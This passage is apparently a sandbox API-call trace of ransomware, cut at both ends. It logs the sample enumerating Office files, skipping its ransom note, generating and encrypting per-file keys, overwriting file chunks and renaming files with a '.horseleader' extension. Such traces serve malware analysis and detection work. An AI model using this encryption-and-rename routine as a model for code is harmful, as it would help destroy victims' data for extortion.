lpString2="#Decrypt#.txt") returned 1 [0244.205] lstrcmpW (lpString1="MSOXMLED.EXE", lpString2="_uninstalling_.png") returned 1 [0244.205] lstrlenW (lpString=".testttjffg") returned 11 [0244.205] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE", lpSrch=".testttjffg") 
returned 0x0 [0244.205] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.205] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.205] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.206] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE") returned 72 [0244.206] StrStrW (lpFirst="MSOXMLED.EXE", lpSrch=".txt") returned 0x0 [0244.206] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=121168) returned 1 [0244.206] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.206] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.210] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xc4a8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.210] ReadFile (in: hFile=0x158, 
lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.210] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.211] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.211] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x18950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.211] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.211] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.211] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.211] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.212] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.212] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) 
returned 1 [0244.212] CloseHandle (hObject=0x158) returned 1 [0244.212] GetProcessHeap () returned 0x780000 [0244.212] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.212] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE.horseleader") returned 84 [0244.212] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLED.EXE.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmled.exe.horseleader")) returned 1 [0244.213] GetProcessHeap () returned 0x780000 [0244.213] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.213] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x553f4600, ftCreationTime.dwHighDateTime=0x1cab7c9, ftLastAccessTime.dwLowDateTime=0x593ede30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x553f4600, ftLastWriteTime.dwHighDateTime=0x1cab7c9, nFileSizeHigh=0x0, nFileSizeLow=0xdb80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSOXMLMF.DLL", cAlternateFileName="")) returned 1 [0244.214] lstrcmpiW (lpString1="MSOXMLMF.DLL", lpString2="Windows") returned -1 [0244.214] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLMF.DLL") returned 72 [0244.214] StrStrIW (lpFirst="MSOXMLMF.DLL", lpSrch=".horseleader") returned 0x0 [0244.214] lstrcmpW (lpString1="MSOXMLMF.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.214] lstrcmpW (lpString1="MSOXMLMF.DLL", 
lpString2="_uninstalling_.png") returned 1 [0244.214] lstrlenW (lpString=".testttjffg") returned 11 [0244.214] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLMF.DLL", lpSrch=".testttjffg") returned 0x0 [0244.214] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.214] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.214] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSOXMLMF.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msoxmlmf.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0244.214] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3922200, ftCreationTime.dwHighDateTime=0x1ca911d, ftLastAccessTime.dwLowDateTime=0x59413f90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf3922200, ftLastWriteTime.dwHighDateTime=0x1ca911d, nFileSizeHigh=0x0, nFileSizeLow=0x124980, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSPTLS.DLL", cAlternateFileName="")) returned 1 [0244.214] lstrcmpiW (lpString1="MSPTLS.DLL", lpString2="Windows") returned -1 [0244.214] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL") returned 70 [0244.214] StrStrIW (lpFirst="MSPTLS.DLL", lpSrch=".horseleader") returned 0x0 [0244.214] lstrcmpW (lpString1="MSPTLS.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.214] lstrcmpW (lpString1="MSPTLS.DLL", lpString2="_uninstalling_.png") returned 1 [0244.215] 
lstrlenW (lpString=".testttjffg") returned 11 [0244.215] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL", lpSrch=".testttjffg") returned 0x0 [0244.215] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.215] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.215] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msptls.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.219] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL") returned 70 [0244.219] StrStrW (lpFirst="MSPTLS.DLL", lpSrch=".txt") returned 0x0 [0244.220] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1198464) returned 1 [0244.220] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.220] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.222] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.223] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.224] SetFilePointerEx (in: 
hFile=0x158, liDistanceToMove=0x8fcc0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.224] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.226] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.226] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.226] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x11f980, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.227] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.231] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.232] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.232] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.232] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.232] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.232] CloseHandle (hObject=0x158) returned 1 [0244.232] GetProcessHeap () returned 0x780000 [0244.232] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.233] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL.horseleader") returned 82 [0244.233] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msptls.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSPTLS.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\msptls.dll.horseleader")) returned 1 [0244.234] GetProcessHeap () returned 0x780000 [0244.234] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.234] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15d97a00, ftCreationTime.dwHighDateTime=0x1caa6a1, ftLastAccessTime.dwLowDateTime=0x6a1819b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x15d97a00, ftLastWriteTime.dwHighDateTime=0x1caa6a1, nFileSizeHigh=0x0, nFileSizeLow=0xac370, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MSSOAP30.DLL", cAlternateFileName="")) returned 1 [0244.234] lstrcmpiW (lpString1="MSSOAP30.DLL", lpString2="Windows") returned -1 [0244.234] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL") returned 72 [0244.234] StrStrIW (lpFirst="MSSOAP30.DLL", 
lpSrch=".horseleader") returned 0x0 [0244.234] lstrcmpW (lpString1="MSSOAP30.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.234] lstrcmpW (lpString1="MSSOAP30.DLL", lpString2="_uninstalling_.png") returned 1 [0244.234] lstrlenW (lpString=".testttjffg") returned 11 [0244.234] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL", lpSrch=".testttjffg") returned 0x0 [0244.234] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.234] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.234] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mssoap30.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.235] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL") returned 72 [0244.235] StrStrW (lpFirst="MSSOAP30.DLL", lpSrch=".txt") returned 0x0 [0244.235] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=705392) returned 1 [0244.235] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.235] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.238] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.238] WriteFile (in: hFile=0x158, 
lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.239] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x539b8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.239] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.287] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.287] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.288] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xa7370, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.288] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.290] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.290] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.291] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.291] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.291] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.291] CloseHandle (hObject=0x158) returned 1 [0244.291] GetProcessHeap () returned 0x780000 [0244.291] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.291] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL.horseleader") returned 84 [0244.292] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mssoap30.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MSSOAP30.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\mssoap30.dll.horseleader")) returned 1 [0244.293] GetProcessHeap () returned 0x780000 [0244.293] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.293] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8054ff00, ftCreationTime.dwHighDateTime=0x1cb7011, ftLastAccessTime.dwLowDateTime=0xcf459e40, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8054ff00, ftLastWriteTime.dwHighDateTime=0x1cb7011, nFileSizeHigh=0x0, nFileSizeLow=0x1a5b, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MUAUTH.CAB", cAlternateFileName="")) returned 1 [0244.293] lstrcmpiW (lpString1="MUAUTH.CAB", lpString2="Windows") returned -1 
[0244.293] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB") returned 70 [0244.293] StrStrIW (lpFirst="MUAUTH.CAB", lpSrch=".horseleader") returned 0x0 [0244.293] lstrcmpW (lpString1="MUAUTH.CAB", lpString2="#Decrypt#.txt") returned 1 [0244.293] lstrcmpW (lpString1="MUAUTH.CAB", lpString2="_uninstalling_.png") returned 1 [0244.293] lstrlenW (lpString=".testttjffg") returned 11 [0244.293] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB", lpSrch=".testttjffg") returned 0x0 [0244.293] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.293] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.293] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.295] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB") returned 70 [0244.295] StrStrW (lpFirst="MUAUTH.CAB", lpSrch=".txt") returned 0x0 [0244.295] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=6747) returned 1 [0244.295] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1a5b, lpOverlapped=0x0) returned 1 [0244.300] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe5a5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0244.300] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1a5b, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1a5b, lpOverlapped=0x0) returned 1 [0244.301] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.301] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.301] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.301] CloseHandle (hObject=0x158) returned 1 [0244.301] GetProcessHeap () returned 0x780000 [0244.301] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.301] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB.horseleader") returned 82 [0244.301] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUAUTH.CAB.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muauth.cab.horseleader")) returned 1 [0244.302] GetProcessHeap () returned 0x780000 [0244.302] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.302] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, 
